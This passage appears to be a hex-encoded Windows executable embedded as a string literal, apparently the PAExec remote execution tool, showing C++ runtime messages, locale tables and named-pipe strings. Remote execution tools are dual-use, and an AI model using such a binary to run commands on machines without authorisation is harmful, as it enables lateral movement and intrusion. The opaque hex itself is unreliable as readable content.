'00320037000d000a002d0020006e006f007400200065006e006f007500670' \
'06800200073007000610063006500200066006f00720020006c006f007700' \
'69006f00200069006e0069007400690061006c0069007a006100740069006' \
'f006e000d000a000000000000000000520036003000320038000d000a002d' \
'00200075006e00610062006c006500200074006f00200069006e006900740' \
'0690061006c0069007a006500200068006500610070000d000a0000000000' \
'520036003000330030000d000a002d00200043005200540020006e006f007' \
'400200069006e0069007400690061006c0069007a00650064000d000a0000' \
'00000000000000520036003000330031000d000a002d00200041007400740' \
'065006d0070007400200074006f00200069006e0069007400690061006c00' \
'69007a0065002000740068006500200043005200540020006d006f0072006' \
'50020007400680061006e0020006f006e00630065002e000a005400680069' \
'007300200069006e006400690063006100740065007300200061002000620' \
'075006700200069006e00200079006f007500720020006100700070006c00' \
'690063006100740069006f006e002e000d000a00000000005200360030003' \
'30032000d000a002d0020006e006f007400200065006e006f007500670068' \
'00200073007000610063006500200066006f00720020006c006f006300610' \
'06c006500200069006e0066006f0072006d006100740069006f006e000d00' \
'0a0000000000520036003000330033000d000a002d0020004100740074006' \
'5006d0070007400200074006f00200075007300650020004d00530049004c' \
'00200063006f00640065002000660072006f006d002000740068006900730' \
'0200061007300730065006d0062006c007900200064007500720069006e00' \
'670020006e0061007400690076006500200063006f0064006500200069006' \
'e0069007400690061006c0069007a006100740069006f006e000a00540068' \
'0069007300200069006e00640069006300610074006500730020006100200' \
'0620075006700200069006e00200079006f00750072002000610070007000' \
'6c00690063006100740069006f006e002e002000490074002000690073002' \
'0006d006f007300740020006c0069006b0065006c00790020007400680065' \
'00200072006500730075006c00740020006f0066002000630061006c006c0' \
'069006e006700200061006e0020004d00530049004c002d0063006f006d00' \
'700069006c0065006400200028002f0063006c00720029002000660075006' \
'e006300740069006f006e002000660072006f006d002000610020006e0061' \
'007400690076006500200063006f006e007300740072007500630074006f0' \
'0720020006f0072002000660072006f006d00200044006c006c004d006100' \
'69006e002e000d000a0000000000520036003000330034000d000a002d002' \
'00069006e0063006f006e00730069007300740065006e00740020006f006e' \
'006500780069007400200062006500670069006e002d0065006e006400200' \
'07600610072006900610062006c00650073000d000a000000000044004f00' \
'4d00410049004e0020006500720072006f0072000d000a000000000053004' \
'9004e00470020006500720072006f0072000d000a000000000054004c004f' \
'005300530020006500720072006f0072000d000a000000720075006e00740' \
'069006d00650020006500720072006f00720020000000000002000000a8c6' \
'41000800000070bd410009000000c8bd41000a00000020be4100100000006' \
'8be410011000000c0be41001200000020bf41001300000068bf4100180000' \
'00c0bf41001900000030c041001a00000080c041001b000000f0c041001c0' \
'0000060c141001e000000acc141001f000000f0c1410020000000b8c24100' \
'2100000020c341002200000010c541007800000078c541007900000098c54' \
'1007a000000b4c54100fc000000a4014200ff000000d0c541005200360030' \
'00300032000d000a002d00200066006c006f006100740069006e006700200' \
'070006f0069006e007400200073007500700070006f007200740020006e00' \
'6f00740020006c006f0061006400650064000d000a0000000000520075006' \
'e00740069006d00650020004500720072006f00720021000a000a00500072' \
'006f006700720061006d003a00200000003c00700072006f0067007200610' \
'06d0020006e0061006d006500200075006e006b006e006f0077006e003e00' \
'000000002e002e002e0000000a000a00000000004d006900630072006f007' \
'3006f00660074002000560069007300750061006c00200043002b002b0020' \
'00520075006e00740069006d00650020004c0069006200720061007200790' \
'0000000007c5b41000c2842002d5c41008bf2400062616420657863657074' \
'696f6e0000000000000070c941007cc9410084c9410090c941009cc94100a' \
'8c94100b4c94100c0c94100c8c94100d0c94100dcc94100e8c94100f2c941' \
'00a0ce4100b4ce4100d0ce4100e4ce410004cf4100f4c94100fcc9410004c' \
'a410008ca41000cca410010ca410014ca410018ca41001cca410020ca4100' \
'2cca410030ca410034ca410038ca41003cca410040ca410044ca410048ca4' \
'1004cca410050ca410054ca410058ca41005cca410060ca410064ca410068' \
'ca41006cca410070ca410074ca410078ca41007cca410080ca410084ca410' \
'088ca41008cca410090ca410094ca410098ca41009cca4100a0ca4100a4ca' \
'4100a8ca4100b4ca4100c0ca4100c8ca4100d4ca4100ecca4100f8ca41000' \
'ccb41002ccb41004ccb41006ccb41008ccb4100accb4100d0cb4100eccb41' \
'0010cc410030cc410058cc410074cc410084cc410088cc410090cc4100a0c' \
'c4100c4cc4100cccc4100d8cc4100e8cc410004cd410024cd41004ccd4100' \
'74cd41009ccd4100c8cd4100e4cd410008ce41002cce410058ce410084ce4' \
'100f2c941005f5f626173656428000000005f5f636465636c005f5f706173' \
'63616c000000005f5f73746463616c6c0000005f5f7468697363616c6c000' \
'05f5f6661737463616c6c00005f5f636c7263616c6c0000005f5f65616269' \
'00005f5f7074723634005f5f726573747269637400005f5f756e616c69676' \
'e656400726573747269637428000000206e6577000000002064656c657465' \
'003d0000003e3e00003c3c0000210000003d3d0000213d00005b5d00006f7' \
'0657261746f72000000002d3e00002a0000002b2b00002d2d00002d000000' \
'2b000000260000002d3e2a002f000000250000003c0000003c3d00003e000' \
'0003e3d00002c000000282900007e0000005e0000007c000000262600007c' \
'7c00002a3d00002b3d00002d3d00002f3d0000253d00003e3e3d003c3c3d0' \
'0263d00007c3d00005e3d00006076667461626c6527000000607662746162' \
'6c6527000000607663616c6c270060747970656f662700000000606c6f636' \
'16c20737461746963206775617264270000000060737472696e6727000000' \
'006076626173652064657374727563746f7227000060766563746f7220646' \
'56c6574696e672064657374727563746f7227000000006064656661756c74' \
'20636f6e7374727563746f7220636c6f7375726527000000607363616c617' \
'22064656c6574696e672064657374727563746f7227000000006076656374' \
'6f7220636f6e7374727563746f72206974657261746f72270000006076656' \
'3746f722064657374727563746f72206974657261746f7227000000006076' \
'6563746f7220766261736520636f6e7374727563746f72206974657261746' \
'f722700607669727475616c20646973706c6163656d656e74206d61702700' \
'0060656820766563746f7220636f6e7374727563746f72206974657261746' \
'f72270000000060656820766563746f722064657374727563746f72206974' \
'657261746f72270060656820766563746f7220766261736520636f6e73747' \
'27563746f72206974657261746f7227000060636f707920636f6e73747275' \
'63746f7220636c6f73757265270000607564742072657475726e696e67270' \
'0604548006052545449000000606c6f63616c2076667461626c652700606c' \
'6f63616c2076667461626c6520636f6e7374727563746f7220636c6f73757' \
'2652700206e65775b5d00002064656c6574655b5d000000606f6d6e692063' \
'616c6c73696727000060706c6163656d656e742064656c65746520636c6f7' \
'375726527000060706c6163656d656e742064656c6574655b5d20636c6f73' \
'7572652700000000606d616e6167656420766563746f7220636f6e7374727' \
'563746f72206974657261746f7227000000606d616e616765642076656374' \
'6f722064657374727563746f72206974657261746f7227000000006065682' \
'0766563746f7220636f707920636f6e7374727563746f7220697465726174' \
'6f722700000060656820766563746f7220766261736520636f707920636f6' \
'e7374727563746f72206974657261746f7227006064796e616d696320696e' \
'697469616c697a657220666f72202700006064796e616d696320617465786' \
'9742064657374727563746f7220666f7220270000000060766563746f7220' \
'636f707920636f6e7374727563746f72206974657261746f7227000060766' \
'563746f7220766261736520636f707920636f6e7374727563746f72206974' \
'657261746f722700000000606d616e6167656420766563746f7220636f707' \
'920636f6e7374727563746f72206974657261746f72270000606c6f63616c' \
'2073746174696320746872656164206775617264270020547970652044657' \
'363726970746f7227000000204261736520436c6173732044657363726970' \
'746f72206174202800204261736520436c617373204172726179270000204' \
'36c617373204869657261726368792044657363726970746f722700000000' \
'20436f6d706c657465204f626a656374204c6f6361746f722700000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000200020002000200020002000200020002000280028' \
'0028002800280020002000200020002000200020002000200020002000200' \
'0200020002000200020002000480010001000100010001000100010001000' \
'1000100010001000100010001000840084008400840084008400840084008' \
'4008400100010001000100010001000100081008100810081008100810001' \
'0001000100010001000100010001000100010001000100010001000100010' \
'0010001000100010010001000100010001000100082008200820082008200' \
'8200020002000200020002000200020002000200020002000200020002000' \
'2000200020002000200020010001000100010002000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000200020002000200020002000200020002000680028002800280' \
'0280020002000200020002000200020002000200020002000200020002000' \
'2000200020002000480010001000100010001000100010001000100010001' \
'0001000100010001000840084008400840084008400840084008400840010' \
'0010001000100010001000100081018101810181018101810101010101010' \
'1010101010101010101010101010101010101010101010101010101010101' \
'0101010110001000100010001000100082018201820182018201820102010' \
'2010201020102010201020102010201020102010201020102010201020102' \
'0102010201020110001000100010002000200020002000200020002000200' \
'0200020002000200020002000200020002000200020002000200020002000' \
'2000200020002000200020002000200020002000480010001000100010001' \
'0001000100010001000100010001000100010001000100010001400140010' \
'0010001000100010001400100010001000100010001000010101010101010' \
'1010101010101010101010101010101010101010101010101010101010101' \
'0101010101010101100001010101010101010101010101010201020102010' \
'2010201020102010201020102010201020102010201020102010201020102' \
'0102010201020102010201100002010201020102010201020102010201010' \
'100000000808182838485868788898a8b8c8d8e8f90919293949596979899' \
'9a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b' \
'8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6' \
'd7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f' \
'5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f10111213' \
'1415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f30313' \
'2333435363738393a3b3c3d3e3f406162636465666768696a6b6c6d6e6f70' \
'7172737475767778797a5b5c5d5e5f606162636465666768696a6b6c6d6e6' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'cbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e' \
'9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff8081828384858687' \
'<KEY>' \
'<KEY>' \
'c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e' \
'3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff0001' \
'02030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f2' \
'<KEY>' \
'<KEY>' \
'd5e5f604142434445464748494a4b4c4d4e4f505152535455565758595a7b' \
'7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999' \
'a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8' \
'b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d' \
'7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5' \
'f6f7f8f9fafbfcfdfeff0100000068e541000200000070e54100030000007' \
'8e541000400000080e541000500000090e541000600000098e54100070000' \
'00a0e5410008000000a8e5410009000000b0e541000a000000b8e541000b0' \
'00000c0e541000c000000c8e541000d000000d0e541000e000000d8e54100' \
'0f000000e0e5410010000000e8e5410011000000f0e5410012000000f8e54' \
'1001300000000e641001400000008e641001500000010e641001600000018' \
'e641001800000020e641001900000028e641001a00000030e641001b00000' \
'038e641001c00000040e641001d00000048e641001e00000050e641001f00' \
'000058e641002000000060e641002100000068e641002200000070e641002' \
'300000078e641002400000080e641002500000088e641002600000090e641' \
'002700000098e6410029000000a0e641002a000000a8e641002b000000b0e' \
'641002c000000b8e641002d000000c0e641002f000000c8e6410036000000' \
'd0e6410037000000d8e6410038000000e0e6410039000000e8e641003e000' \
'000f0e641003f000000f8e641004000000000e741004100000008e7410043' \
'00000010e741004400000018e741004600000020e741004700000028e7410' \
'04900000030e741004a00000038e741004b00000040e741004e00000048e7' \
'41004f00000050e741005000000058e741005600000060e74100570000006' \
'8e741005a00000070e741006500000078e741007f00000030014200010400' \
'0080e74100020400008ce741000304000098e7410004040000bcb54100050' \
'40000a4e7410006040000b0e7410007040000bce7410008040000c8e74100' \
'0904000018b941000b040000d4e741000c040000e0e741000d040000ece74' \
'1000e040000f8e741000f04000004e841001004000010e841001104000098' \
'b5410012040000b0b54100130400001ce841001404000028e841001504000' \
'034e841001604000040e84100180400004ce841001904000058e841001a04' \
'000064e841001b04000070e841001c0400007ce841001d04000088e841001' \
'e04000094e841001f040000a0e8410020040000ace8410021040000b8e841' \
'0022040000c4e8410023040000d0e8410024040000dce8410025040000e8e' \
'8410026040000f4e841002704000000e94100290400000ce941002a040000' \
'18e941002b04000024e941002c04000030e941002d04000048e941002f040' \
'00054e941003204000060e94100340400006ce941003504000078e9410036' \
'04000084e941003704000090e94100380400009ce9410039040000a8e9410' \
'03a040000b4e941003b040000c0e941003e040000cce941003f040000d8e9' \
'410040040000e4e9410041040000f0e9410043040000fce94100440400001' \
'4ea41004504000020ea4100460400002cea41004704000038ea4100490400' \
'0044ea41004a04000050ea41004b0400005cea41004c04000068ea41004e0' \
'4000074ea41004f04000080ea4100500400008cea41005204000098ea4100' \
'56040000a4ea410057040000b0ea41005a040000c0ea410065040000d0ea4' \
'1006b040000e0ea41006c040000f0ea410081040000fcea41000108000008' \
'eb410004080000a4b541000708000014eb41000908000020eb41000a08000' \
'02ceb41000c08000038eb41001008000044eb41001308000050eb41001408' \
'00005ceb41001608000068eb41001a08000074eb41001d0800008ceb41002' \
'c08000098eb41003b080000b0eb41003e080000bceb410043080000c8eb41' \
'006b080000e0eb4100010c0000f0eb4100040c0000fceb4100070c000008e' \
'c4100090c000014ec41000a0c000020ec41000c0c00002cec41001a0c0000' \
'38ec41003b0c000050ec41006b0c00005cec4100011000006cec410004100' \
'00078ec41000710000084ec41000910000090ec41000a1000009cec41000c' \
'100000a8ec41001a100000b4ec41003b100000c0ec410001140000d0ec410' \
'004140000dcec410007140000e8ec410009140000f4ec41000a14000000ed' \
'41000c1400000ced41001a14000018ed41003b14000030ed4100011800004' \
'0ed4100091800004ced41000a18000058ed41000c18000064ed41001a1800' \
'0070ed41003b18000088ed4100011c000098ed4100091c0000a4ed41000a1' \
'c0000b0ed41001a1c0000bced41003b1c0000d4ed410001200000e4ed4100' \
'09200000f0ed41000a200000fced41003b20000008ee41000124000018ee4' \
'1000924000024ee41000a24000030ee41003b2400003cee4100012800004c' \
'ee41000928000058ee41000a28000064ee4100012c000070ee4100092c000' \
'07cee41000a2c000088ee41000130000094ee410009300000a0ee41000a30' \
'0000acee410001340000b8ee410009340000c4ee41000a340000d0ee41000' \
'1380000dcee41000a380000e8ee4100013c0000f4ee41000a3c000000ef41' \
'00014000000cef41000a40000018ef41000a44000024ef41000a48000030e' \
'f41000a4c00003cef41000a50000048ef4100047c000054ef41001a7c0000' \
'64ef41003001420042000000d0e641002c0000006cef41007100000068e54' \
'1000000000078ef4100d800000084ef4100da00000090ef4100b10000009c' \
'ef4100a0000000a8ef41008f000000b4ef4100cf000000c0ef4100d500000' \
'0ccef4100d2000000d8ef4100a9000000e4ef4100b9000000f0ef4100c400' \
'0000fcef4100dc00000008f041004300000014f04100cc00000020f04100b' \
'f0000002cf04100c8000000b8e641002900000038f041009b00000050f041' \
'006b00000078e641002100000068f041006300000070e541000100000074f' \
'041004400000080f041007d0000008cf04100b700000078e5410002000000' \
'a4f041004500000090e5410004000000b0f0410047000000bcf0410087000' \
'00098e5410005000000c8f0410048000000a0e5410006000000d4f04100a2' \
'000000e0f0410091000000ecf0410049000000f8f04100b300000004f1410' \
'0ab00000078e741004100000010f141008b000000a8e541000700000020f1' \
'41004a000000b0e54100080000002cf14100a300000038f14100cd0000004' \
'4f14100ac00000050f14100c90000005cf141009200000068f14100ba0000' \
'0074f14100c500000080f14100b40000008cf14100d600000098f14100d00' \
'00000a4f141004b000000b0f14100c0000000bcf14100d3000000b8e54100' \
'09000000c8f14100d1000000d4f14100dd000000e0f14100d7000000ecf14' \
'100ca000000f8f14100b500000004f24100c100000010f24100d40000001c' \
'f24100a400000028f24100ad00000034f24100df00000040f241009300000' \
'04cf24100e000000058f24100bb00000064f24100ce00000070f24100e100' \
'00007cf24100db00000088f24100de00000094f24100d9000000a0f24100c' \
'600000088e6410023000000acf2410065000000c0e641002a000000b8f241' \
'006c000000a0e6410026000000c4f2410068000000c0e541000a000000d0f' \
'241004c000000e0e641002e000000dcf2410073000000c8e541000b000000' \
'e8f2410094000000f4f24100a500000000f34100ae0000000cf341004d000' \
'00018f34100b600000024f34100bc00000060e741003e00000030f3410088' \
'00000028e74100370000003cf341007f000000d0e541000c00000048f3410' \
'04e000000e8e641002f00000054f341007400000030e641001800000060f3' \
'4100af0000006cf341005a000000d8e541000d00000078f341004f000000b' \
'0e641002800000084f341006a00000068e641001f00000090f34100610000' \
'00e0e541000e0000009cf3410050000000e8e541000f000000a8f34100950' \
'00000b4f3410051000000f0e5410010000000c0f3410052000000d8e64100' \
'2d000000ccf3410072000000f8e6410031000000d8f341007800000040e74' \
'1003a000000e4f3410082000000f8e541001100000068e741003f000000f0' \
'f341008900000000f441005300000000e74100320000000cf441007900000' \
'098e641002500000018f441006700000090e641002400000024f441006600' \
'000030f441008e000000c8e641002b0000003cf441006d00000048f441008' \
'300000058e741003d00000054f441008600000048e741003b00000060f441' \
'0084000000f0e64100300000006cf441009d00000078f441007700000084f' \
'441007500000090f441005500000000e64100120000009cf4410096000000' \
'a8f4410054000000b4f441009700000008e6410013000000c0f441008d000' \
'00020e7410036000000ccf441007e00000010e6410014000000d8f4410056' \
'00000018e6410015000000e4f4410057000000f0f4410098000000fcf4410' \
'08c0000000cf541009f0000001cf54100a800000020e64100160000002cf5' \
'41005800000028e641001700000038f541005900000050e741003c0000004' \
'4f541008500000050f54100a70000005cf541007600000068f541009c0000' \
'0038e641001900000074f541005b00000080e641002200000080f54100640' \
'000008cf54100be0000009cf54100c3000000acf54100b0000000bcf54100' \
'b8000000ccf54100cb000000dcf54100c700000040e641001a000000ecf54' \
'1005c00000064ef4100e3000000f8f54100c200000010f64100bd00000028' \
'f64100a600000040f641009900000048e641001b00000058f641009a00000' \
'064f641005d00000008e741003300000070f641007a00000070e741004000' \
'00007cf641008a00000030e74100380000008cf641008000000038e741003' \
'900000098f641008100000050e641001c000000a4f641005e000000b0f641' \
'006e00000058e641001d000000bcf641005f00000018e7410035000000c8f' \
'641007c00000070e6410020000000d4f641006200000060e641001e000000' \
'e0f641006000000010e7410034000000ecf641009e00000004f741007b000' \
'000a8e64100270000001cf741006900000028f741006f00000034f7410003' \
'00000044f74100e200000054f741009000000060f74100a10000006cf7410' \
'0b200000078f74100aa00000084f741004600000090f74100700000006100' \
'720000000000620067000000000063006100000000007a0068002d0043004' \
'8005300000000006300730000000000640061000000000064006500000000' \
'0065006c000000000065006e0000000000650073000000000066006900000' \
'0000066007200000000006800650000000000680075000000000069007300' \
'0000000069007400000000006a006100000000006b006f00000000006e006' \
'c00000000006e006f000000000070006c0000000000700074000000000072' \
'006f00000000007200750000000000680072000000000073006b000000000' \
'0730071000000000073007600000000007400680000000000740072000000' \
'00007500720000000000690064000000000075006b0000000000620065000' \
'000000073006c000000000065007400000000006c007600000000006c0074' \
'0000000000660061000000000076006900000000006800790000000000610' \
'07a000000000065007500000000006d006b00000000006100660000000000' \
'6b0061000000000066006f000000000068006900000000006d00730000000' \
'0006b006b00000000006b00790000000000730077000000000075007a0000' \
'0000007400740000000000700061000000000067007500000000007400610' \
'00000000074006500000000006b006e00000000006d007200000000007300' \
'6100000000006d006e000000000067006c00000000006b006f006b0000007' \
'3007900720000006400690076000000610072002d00530041000000620067' \
'002d00420047000000630061002d00450053000000630073002d0043005a0' \
'00000640061002d0044004b000000640065002d0044004500000065006c00' \
'2d00470052000000660069002d00460049000000660072002d00460052000' \
'000680065002d0049004c000000680075002d00480055000000690073002d' \
'00490053000000690074002d004900540000006e006c002d004e004c00000' \
'06e0062002d004e004f00000070006c002d0050004c000000700074002d00' \
'42005200000072006f002d0052004f000000720075002d005200550000006' \
'80072002d0048005200000073006b002d0053004b000000730071002d0041' \
'004c000000730076002d00530045000000740068002d00540048000000740' \
'072002d00540052000000750072002d0050004b000000690064002d004900' \
'4400000075006b002d00550041000000620065002d0042005900000073006' \
'c002d00530049000000650074002d004500450000006c0076002d004c0056' \
'0000006c0074002d004c0054000000660061002d004900520000007600690' \
'02d0056004e000000680079002d0041004d00000061007a002d0041005a00' \
'2d004c00610074006e0000000000650075002d004500530000006d006b002' \
'd004d004b00000074006e002d005a0041000000780068002d005a00410000' \
'007a0075002d005a0041000000610066002d005a00410000006b0061002d0' \
'047004500000066006f002d0046004f000000680069002d0049004e000000' \
'6d0074002d004d0054000000730065002d004e004f0000006d0073002d004' \
'd00590000006b006b002d004b005a0000006b0079002d004b004700000073' \
'0077002d004b004500000075007a002d0055005a002d004c00610074006e0' \
'000000000740074002d0052005500000062006e002d0049004e0000007000' \
'61002d0049004e000000670075002d0049004e000000740061002d0049004' \
'e000000740065002d0049004e0000006b006e002d0049004e0000006d006c' \
'002d0049004e0000006d0072002d0049004e000000730061002d0049004e0' \
'000006d006e002d004d004e000000630079002d0047004200000067006c00' \
'2d004500530000006b006f006b002d0049004e00000000007300790072002' \
'd0053005900000000006400690076002d004d00560000000000710075007a' \
'002d0042004f00000000006e0073002d005a00410000006d0069002d004e0' \
'05a000000610072002d00490051000000640065002d004300480000006500' \
'6e002d00470042000000650073002d004d0058000000660072002d0042004' \
'5000000690074002d004300480000006e006c002d004200450000006e006e' \
'002d004e004f000000700074002d00500054000000730072002d005300500' \
'02d004c00610074006e0000000000730076002d0046004900000061007a00' \
'2d0041005a002d004300790072006c0000000000730065002d00530045000' \
'0006d0073002d0042004e00000075007a002d0055005a002d004300790072' \
'006c0000000000710075007a002d004500430000000000610072002d00450' \
'0470000007a0068002d0048004b000000640065002d004100540000006500' \
'6e002d00410055000000650073002d00450053000000660072002d0043004' \
'1000000730072002d00530050002d004300790072006c0000000000730065' \
'002d00460049000000710075007a002d005000450000000000610072002d0' \
'04c00590000007a0068002d00530047000000640065002d004c0055000000' \
'65006e002d00430041000000650073002d00470054000000660072002d004' \
'30048000000680072002d0042004100000073006d006a002d004e004f0000' \
'000000610072002d0044005a0000007a0068002d004d004f0000006400650' \
'02d004c004900000065006e002d004e005a000000650073002d0043005200' \
'0000660072002d004c0055000000620073002d00420041002d004c0061007' \
'4006e000000000073006d006a002d005300450000000000610072002d004d' \
'004100000065006e002d00490045000000650073002d00500041000000660' \
'072002d004d0043000000730072002d00420041002d004c00610074006e00' \
'0000000073006d0061002d004e004f0000000000610072002d0054004e000' \
'00065006e002d005a0041000000650073002d0044004f000000730072002d' \
'00420041002d004300790072006c000000000073006d0061002d005300450' \
'000000000610072002d004f004d00000065006e002d004a004d0000006500' \
'73002d0056004500000073006d0073002d004600490000000000610072002' \
'd0059004500000065006e002d00430042000000650073002d0043004f0000' \
'0073006d006e002d004600490000000000610072002d00530059000000650' \
'06e002d0042005a000000650073002d00500045000000610072002d004a00' \
'4f00000065006e002d00540054000000650073002d0041005200000061007' \
'2002d004c004200000065006e002d005a0057000000650073002d00450043' \
'000000610072002d004b005700000065006e002d005000480000006500730' \
'02d0043004c000000610072002d00410045000000650073002d0055005900' \
'0000610072002d00420048000000650073002d00500059000000610072002' \
'd00510041000000650073002d0042004f000000650073002d005300560000' \
'00650073002d0048004e000000650073002d004e0049000000650073002d0' \
'05000520000007a0068002d00430048005400000000007300720000000000' \
'610066002d007a0061000000610072002d00610065000000610072002d006' \
'20068000000610072002d0064007a000000610072002d0065006700000061' \
'0072002d00690071000000610072002d006a006f000000610072002d006b0' \
'077000000610072002d006c0062000000610072002d006c00790000006100' \
'72002d006d0061000000610072002d006f006d000000610072002d0071006' \
'1000000610072002d00730061000000610072002d00730079000000610072' \
'002d0074006e000000610072002d0079006500000061007a002d0061007a0' \
'02d006300790072006c000000000061007a002d0061007a002d006c006100' \
'74006e0000000000620065002d00620079000000620067002d00620067000' \
'00062006e002d0069006e000000620073002d00620061002d006c00610074' \
'006e0000000000630061002d00650073000000630073002d0063007a00000' \
'0630079002d00670062000000640061002d0064006b000000640065002d00' \
'610074000000640065002d00630068000000640065002d006400650000006' \
'40065002d006c0069000000640065002d006c00750000006400690076002d' \
'006d0076000000000065006c002d0067007200000065006e002d006100750' \
'0000065006e002d0062007a00000065006e002d0063006100000065006e00' \
'2d0063006200000065006e002d0067006200000065006e002d00690065000' \
'00065006e002d006a006d00000065006e002d006e007a00000065006e002d' \
'0070006800000065006e002d0074007400000065006e002d0075007300000' \
'065006e002d007a006100000065006e002d007a0077000000650073002d00' \
'610072000000650073002d0062006f000000650073002d0063006c0000006' \
'50073002d0063006f000000650073002d00630072000000650073002d0064' \
'006f000000650073002d00650063000000650073002d00650073000000650' \
'073002d00670074000000650073002d0068006e000000650073002d006d00' \
'78000000650073002d006e0069000000650073002d0070006100000065007' \
'3002d00700065000000650073002d00700072000000650073002d00700079' \
'000000650073002d00730076000000650073002d007500790000006500730' \
'02d00760065000000650074002d00650065000000650075002d0065007300' \
'0000660061002d00690072000000660069002d0066006900000066006f002' \
'd0066006f000000660072002d00620065000000660072002d006300610000' \
'00660072002d00630068000000660072002d00660072000000660072002d0' \
'06c0075000000660072002d006d006300000067006c002d00650073000000' \
'670075002d0069006e000000680065002d0069006c000000680069002d006' \
'9006e000000680072002d00620061000000680072002d0068007200000068' \
'0075002d00680075000000680079002d0061006d000000690064002d00690' \
'064000000690073002d00690073000000690074002d006300680000006900' \
'74002d006900740000006a0061002d006a00700000006b0061002d0067006' \
'50000006b006b002d006b007a0000006b006e002d0069006e0000006b006f' \
'006b002d0069006e00000000006b006f002d006b00720000006b0079002d0' \
'06b00670000006c0074002d006c00740000006c0076002d006c0076000000' \
'6d0069002d006e007a0000006d006b002d006d006b0000006d006c002d006' \
'9006e0000006d006e002d006d006e0000006d0072002d0069006e0000006d' \
'0073002d0062006e0000006d0073002d006d00790000006d0074002d006d0' \
'0740000006e0062002d006e006f0000006e006c002d006200650000006e00' \
'6c002d006e006c0000006e006e002d006e006f0000006e0073002d007a006' \
'1000000700061002d0069006e00000070006c002d0070006c000000700074' \
'002d00620072000000700074002d00700074000000710075007a002d00620' \
'06f0000000000710075007a002d006500630000000000710075007a002d00' \
'700065000000000072006f002d0072006f000000720075002d00720075000' \
'000730061002d0069006e000000730065002d00660069000000730065002d' \
'006e006f000000730065002d0073006500000073006b002d0073006b00000' \
'073006c002d0073006900000073006d0061002d006e006f00000000007300' \
'6d0061002d00730065000000000073006d006a002d006e006f00000000007' \
'3006d006a002d00730065000000000073006d006e002d0066006900000000' \
'0073006d0073002d006600690000000000730071002d0061006c000000730' \
'072002d00620061002d006300790072006c0000000000730072002d006200' \
'61002d006c00610074006e0000000000730072002d00730070002d0063007' \
'90072006c0000000000730072002d00730070002d006c00610074006e0000' \
'000000730076002d00660069000000730076002d007300650000007300770' \
'02d006b00650000007300790072002d007300790000000000740061002d00' \
'69006e000000740065002d0069006e000000740068002d007400680000007' \
'4006e002d007a0061000000740072002d00740072000000740074002d0072' \
'007500000075006b002d00750061000000750072002d0070006b000000750' \
'07a002d0075007a002d006300790072006c000000000075007a002d007500' \
'7a002d006c00610074006e0000000000760069002d0076006e00000078006' \
'8002d007a00610000007a0068002d00630068007300000000007a0068002d' \
'00630068007400000000007a0068002d0063006e0000007a0068002d00680' \
'06b0000007a0068002d006d006f0000007a0068002d007300670000007a00' \
'68002d007400770000007a0075002d007a006100000041000000170000000' \
'0000000068080868081800000100386808682801405054545458585850500' \
'0030308050808800080028273850578000070037303050508800000020288' \
'0888080000000606860686868080807787070777070080800000800080007' \
'080000005500530045005200330032002e0044004c004c00000000004d657' \
'373616765426f78570047657441637469766557696e646f77004765744c61' \
'7374416374697665506f7075700000476574557365724f626a656374496e6' \
'66f726d6174696f6e5700000047657450726f6365737357696e646f775374' \
'6174696f6e0043004f004e004f0055005400240000006d61702f7365743c5' \
'43e20746f6f206c6f6e67008c2842004410400020003a003d000000220000' \
'002d002f0000000000efbbbf005c005c002e005c0070006900700065005c0' \
'05000410045007800650063004f0075007400250073002500750000000000' \
'0000000050004100450078006500630020006600610069006c00650064002' \
'00074006f0020006300720065006100740065002000700069007000650020' \
'00250073002e00000000005c005c002e005c0070006900700065005c00500' \
'0410045007800650063004500720072002500730025007500000000005c00' \
'5c002e005c0070006900700065005c0050004100450078006500630049006' \
'e00250073002500750000004500720072006f007200200063007200650061' \
'00740069006e00670020007200650064006900720065006300740069006f0' \
'06e0020007000690070006500730000000000000000004400450042005500' \
'47003a00200043006c00690065006e007400200063006f006e006e0065006' \
'300740065006400200074006f00200070006900700065000000257300005c' \
'005c00250073005c0070006900700065005c0050004100450078006500630' \
'04f0075007400250073002500750000005c005c00250073005c0070006900' \
'700065005c005000410045007800650063004500720072002500730025007' \
'50000005c005c00250073005c0070006900700065005c0050004100450078' \
'006500630049006e002500730025007500000000004600610069006c00650' \
'06400200074006f0020006f00700065006e002000720065006d006f007400' \
'65002000700069007000650073000000766563746f723c543e20746f6f206' \
'c6f6e670000696e76616c696420737472696e6720706f736974696f6e0073' \
'7472696e6720746f6f206c6f6e6700496e746572616374697665536573736' \
'96f6e2e63707000005500730069006e006700200053006500730073006900' \
'6f006e00490044002000250075002000280069006e0074006500720061006' \
